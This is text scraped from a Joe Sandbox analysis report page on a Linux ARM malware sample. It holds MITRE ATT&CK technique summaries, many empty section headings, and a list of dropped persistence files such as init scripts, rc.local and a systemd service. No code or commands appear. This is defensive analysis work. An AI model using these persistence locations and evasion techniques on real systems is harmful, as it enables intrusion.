Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/arm.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.vEDlp5 (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 6225, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6225, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6226, Parent PID: 4331

Linux Analysis Report
arm.nn.elf